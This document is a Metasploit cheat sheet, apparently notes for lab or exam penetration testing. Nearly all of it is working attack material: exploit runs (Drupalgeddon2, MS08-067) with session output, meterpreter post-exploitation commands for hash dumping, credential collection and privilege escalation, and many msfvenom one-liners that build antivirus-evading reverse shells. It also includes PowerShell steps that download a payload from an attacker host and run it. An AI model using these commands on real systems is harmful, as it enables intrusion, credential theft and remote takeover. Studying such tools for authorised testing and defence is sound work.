#
Metasploit
Metasploit is an open-source pentesting framework maintained by rapid7 and utilized by security engineers around the world.
#
Basics
msfconsole # start metasploit
msf6 > db_status # verify metasploit is connected to database
msf6 > help # list commands
msf 6 > search CVE-2014-6287 # search for a module
msf 6 > use 0 # use the first exploit
msf 6 > options # look at module options
#
Usage
db_nmap -sV 10.10.10.10 #builtin nmap
hosts #See what information is in the database.
services #Get information about services in the database.
vulns #Get information about vulnerabilities
search EXPLOIT/NAME #search exploit
use EXPLOIT_NAME #use an exploit
use # #An easier way is to use the number next to the one you want in the list
set RHOSTS 10.10.10.10 #Set hosts to attack
set LHOST 10.10.10.10 #Set local host for things like reverse shells
show payloads #Some exploits don't have payloads, so you need to add one.
set payload 5 #Setting the payload
show targets #Show targets
set target 2 #Set target as applicable
exploit #Run exploit
run -j #Run exploit as a job
jobs #Check on status of job
options #If exploit fails doublecheck options like LHOST and RHOST
session -i 1 #Bring session 2 to foreground
#
Post exploitation
#
Upgrading shell to meterpeter
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime.
background the shell by typping ctrl+z
msf6 > search shell_to_meterpreter
msf6 > use 0
msf6 post(multi/manage/shell_to_meterpreter) > set session 1 #or whatever session you want
msf6 post(multi/manage/shell_to_meterpreter) > exploitIn meterpreter you can do things to pivot and gain footholds.
sysinfo # Very handy for searching for exploits
ps # look at running processes
upload winPEAS.bat # Upload a file
upload file c:\\windows # Upload file to c:\windows
download c:\\windows\\repair\\sam /tmp # download a file to /tmp
execute -f cmd -c # start a command shell
cd "c:\program files (x86)" # Use quotes in for filenames with spaces
shell # Get a shell on target
powershell_shell # Get powershell shell on target
getsystem # Get system on target
hashdump # attempts to dump the hashes on the target
credcollect # attempt to dump creds
portfwd add –l 3389 –p 3389 –r $IP # Meterpreter create port forward to target machine:
portfwd delete –l 3389 –p 3389 –r $IP # Meterpreter delete port forward:
search -f *.xlsx # Search excel files on target machine:
getuid # get user id
#
Drupalgeddon Example
msf6 > use unix/webapp/drupal_drupalgeddon2
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 10.10.10.233
rhost => 10.10.10.233
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 80
rport => 80
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 10.10.14.14
lhost => 10.10.14.14
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 10.10.14.14:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 10.10.10.233
[*] Meterpreter session 1 opened (10.10.14.14:4444 -> 10.10.10.233:42520)
#
msfvenom reverse shell
A staged payload means that your payload consists of two main components: a small stub loader and the final stage payload. When you deliver windows/shell/reverse_tcp to the target machine, for example, you are actually sending the loader first. And then when that loader gets executed, it will ask the handler (on the attacker’s end) to send over the final stage (the larger payload), and finally you get a shell.
A single payload means it’s meant to be a fire-and-forget kind of payload. This can be used when the target has no network access. shikata_ga_nai is an encoder to keep AV from triggering on file.
#
Staged Example
On local machine:
# create staged reverse shell
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.10.10.10 LPORT=4443 -f exe -o revshell.exe
# Setup simple server to serve it out
python3 -m http.server 80
# Setup metasploit handler
msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.13.20.31:8080 On remote machine:
# download reverse shell
powershell -c "Invoke-WebRequest -Uri 'http://10.10.10.10:80/revshell.exe' -OutFile 'c:\windows\temp\revshell.exe'"
# run reverse shell on target
c:\windows\temp\revshell.exe
#
Stageless Example
# create a stageless x86 meterpreter executable
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f exe -o shell-x64.exe
# create a stageless x86 meterpreter executable alternatively
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f exe -e x86/shikata_ga_nai -o shell-x86.exe
# setup metasploit handler
msfconsole -q
msf6 > use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter_reverse_tcp # x86
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter_reverse_tcp # or x64 depending on architecture
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.13.20.31:443
On remote machine:
# download reverse shell
powershell -c "Invoke-WebRequest -Uri 'http://10.10.10.10:80/revshell.exe' -OutFile 'c:\windows\temp\revshell.exe'"
# run reverse shell on target
c:\windows\temp\revshell.exe
#
msfvenom reverse shell examples
# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php
# Java WAR reverse shell
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war
# Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
# Linux FreeBSD reverse shell
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf
# Linux C reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c
# Windows non staged reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe
# Windows Staged (Meterpreter) reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe
# Windows Python reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py
# Windows ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f asp -e x86/shikata_ga_nai -o shell.asp
# Windows ASPX reverse shell
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx
# Windows JavaScript reverse shell with nops
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18
# Windows Powershell reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1
# Windows reverse shell excluding bad characters
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai
# Windows x64 bit reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe
# Windows reverse shell embedded into plink
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
#
Catching existing http meterpreter_reverse_http
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter_reverse_http
set LHOST 10.10.10.10
set LPORT 80
exploitnow it will wait for an incoming connection.
#
Installing
You may need to install on a box
https://information.rapid7.com/metasploit-framework.html
msfdb init
#
metasploit ms08-067
search ms08 067
use windows/smb/ms08_067_netapi
set LHOST tun0
set RHOST 10.10.10.10
show targets # Shows, may be important if automatic doesn't work
set Target 0 # Auto Detect
show payloads
set payload windows/shell_reverse_tcp
set SMB::AlwaysEncrypt false # This is required to work with msf6
set SMB::ProtocolVersion 1 # This is required to work with msf6
exploit